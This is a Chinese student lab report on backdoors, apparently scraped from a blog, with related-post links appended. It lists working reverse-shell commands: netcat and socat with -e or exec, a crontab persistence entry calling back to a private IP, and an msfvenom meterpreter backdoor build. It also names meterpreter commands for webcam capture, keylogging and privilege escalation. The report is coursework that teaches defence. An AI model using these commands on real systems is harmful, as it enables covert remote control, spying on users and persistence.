20145301《网络对抗》Exp2 后门原理与实践
20145301《网络对抗》Exp2 后门原理与实践
基础问题回答
- 例举你能想到的一个后门进入到你系统中的可能方式?
- 系统或者某些软件自身留下的后门。
- 钓鱼网站等非正规网站上捆绑下载
- 例举你知道的后门如何启动起来(win及linux)的方式?
- 操作系统自带服务;
- 网络协议捆绑;
- 被控端被设置了cron启动,定时循环启动;
- 被控端被设置了任务计划启动,在被控端达到某个条件时自动运行;
- 社会工程学等相关方式,比如诱导你自己打开后门软件;
- Meterpreter有哪些给你映像深刻的功能?
- 通过指令可以捕获计算机的摄像头,这样可以在毫无察觉的情况下隐私完全曝光
- 可以捕获键盘敲击信息,这样,经过识别,无论时聊天记录,还是账号密码都可以被非法获取。
- 可以直接提升攻击者的权限,获取靶机的shell
- 如何发现自己有系统有没有被安装后门?
- 没有经过免杀处理的常见后门程序会很容易就被杀毒工具发现并清理;
- 查看开启的端口和对应的进程,发现非默认常见的端口,找到对应的进程,对其行为分析;
- 下载专门的监控防护软件。
实验总结与体会
- 在这次实验中体会了一把当“黑客”的感觉,虽然是自己入侵自己,但实验成功的时候还是十分喜悦激动的。也能理解那些当年的爱好者为何能在毫无利益驱动下依然孜孜不倦的做着各种尝试和攻击。而现在的攻击者日渐功利化、专业化、集团化,这就使防范变的更加困难和艰巨。
- 在这次实验中深刻体会到了计算机系统的脆弱性。短短的几行代码和攻击程序就能将整个电脑占为己用。尤其时大多数人没有足够的防范意识和措施,更加致使现在网络病毒木马后门等程序的泛滥。
- 在除了从自身做起,提高安全防范意识。比如:不在不安全的网站上下载软件、视频等,定时更新杀软、关闭不需要的端口,定期更新系统及时打上补丁,学会对进程进行查看与操作,及时发现计算机中等异常情况等等等等。还要像身边人宣传这种防范意识,共同抵御安全威胁。
实践过程记录
Windows获得Linux Shell
在Windows下查看IP并监听5301端口
在Kali下,使用nc指令的-e选项反向连接Windows的5301端口:
Windows下便可获得Kali的shell:
Linux获得Windows Shell
Kali下查看IP:
使用nc指令监听5215端口:
Windows使用ncat.exe程序的-e选项项反向连接Kali的5301端口:
Kali下可以输入Windows命令:
使用nc传输数据
Windows下监听5301端口:
Kali下连接到Windows的5301端口,即可开始对话:
(1)使用netcat获取主机操作Shell,cron启动
先在Windows系统下,监听5301端口:
用crontab -e指令编辑一条定时任务,选择vim编辑器:crontab指令可以用于设置周期性被执行的指令
在最后一行添加06 * * * * /bin/netcat 192.168.1.106 5301 -e /bin/sh,在每个小时的第06分钟反向连接Windows主机的5301端口
每当时间到了06分时,便可获得Kali的shell。
(2)使用socat获取主机操作Shell, 任务计划启动
在Windows系统下,打开控制面板-更多-管理工具-任务计划程序,创建任务,并新建一个触发器:
在操作-程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:5301 exec:cmd.exe,pty,stderr。
创建完成之后,锁定计算机,再次打开时,创建的任务已经开始运行:
此时,在Kali环境下输入指令socat - tcp:192.168.1.106:5301,便成功获得了一个cmd shell:
(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=5301 -f exe > 20145301_backdoor.exe生成后门程序:
通过nc将生成的后门程序传送到Windows主机上:
在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
设置完成后,执行监听:
打开Windows上的后门程序:
此时Kali上可以远程控制的shell:
(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
record_mic指令可以截获一段音频(但时间非常短...); webcam_snap指令可以使用摄像头进行拍照;webcam stream指令可以使用摄像头进行录像:
screenshot指令可以进行截屏:
keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令可以读取击键的记录:
getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功
20145301《网络对抗》Exp2 后门原理与实践的更多相关文章
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- 20155331 丹增旦达 网络攻防 Exp2后门原理与实践
20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155302 Exp2 后门原理与实践
20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
随机推荐
- 【IOS6.0 自学瞎折腾】(五)应用程序的启动过程和Application生命周期
一 :main函数入口 看下项目资源结构,其实程序的入口也是在main.m里面. #import <UIKit/UIKit.h> #import "BvinAppDelegate ...
- java 集合之HashMap
原文出处http://zhangshixi.iteye.com/blog/672697 1. HashMap概述: HashMap是基于哈希表的Map接口的非同步实现.此实现提供所有可选的映射操 ...
- 图论之最短路径(1)——Floyd Warshall & Dijkstra算法
开始图论学习的第二部分:最短路径. 由于知识储备还不充足,暂时不使用邻接表的方法来计算. 最短路径主要分为两部分:多源最短路径和单源最短路径问题 多源最短路径: 介绍最简单的Floyd Warshal ...
- 教主泡嫦娥[有趣的dp状态设计]
P1342 教主泡嫦娥 时间: 1000ms / 空间: 131072KiB / Java类名: Main 背景 2012年12月21日下午3点14分35秒,全世界各国的总统以及领导人都已经汇聚在中国 ...
- WEB安全第二篇--用文件搞定服务器:任意文件上传、文件包含与任意目录文件遍历
零.前言 最近做专心web安全有一段时间了,但是目测后面的活会有些复杂,涉及到更多的中间件.底层安全.漏洞研究与安全建设等越来越复杂的东东,所以在这里想写一个系列关于web安全基础以及一些讨巧的pay ...
- linux 程序启动与停止管理脚本
公司接了一个第三方的系统,基于linux写的几个程序,一共有9个部件,第三方没有给脚本,每次启动或停止都得一个一个手工去停止或修改.......,这里稍微鄙视下. 没办法,求人还不如自己动手写, 需求 ...
- 常用meta标签及说明
1.charset 定义文档的字符编码 例如: <meta charset="UTF-8"> 2. name 把 content 属性关联到一个名称,其属性有 ...
- EF的使用(DbContext对象的共用问题)
1.问题的引入 对于某一个数据库的EF操作对象,当执行某一次请求的时候,可能会多次操作数据库,也就是可能创建很多MyDbContext(继承自DbContext对象,EF上下文对象) 2.代码创建 当 ...
- rac数据库单连接报错ora-12537解决办法
1.现象如下: C:\Users\Administrator.DBA-PC>sqlplus sys/oracle@192.168.100.33:1521/orcl as sys dba SQL* ...
- sql server 用脚本管理作业
转自:https://blog.csdn.net/yunye114105/article/details/6594826 摘要: 在SQL SERVER中用脚本管理作业,在绝大部分场景下,脚本都比UI ...